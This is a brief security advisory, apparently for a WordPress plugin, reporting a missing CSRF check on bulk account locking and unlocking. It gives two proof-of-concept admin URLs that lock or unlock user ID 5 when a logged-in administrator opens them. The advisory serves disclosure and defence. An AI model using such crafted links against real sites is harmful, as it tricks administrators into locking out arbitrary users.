Description The plugin does not have CSRF check when bulk locking and unlocking accounts, which could allow attackers to make logged in admins lock and unlock arbitrary users via a CSRF attack
Make a logged in admin open one of the links below, this will make them lock/unlock the user with ID 5
https://example.com/wp-admin/users.php?action=lock&action2=lock&users%5B0%5D=5
https://example.com/wp-admin/users.php?action=unlock&action2=unlock&users%5B0%5D=5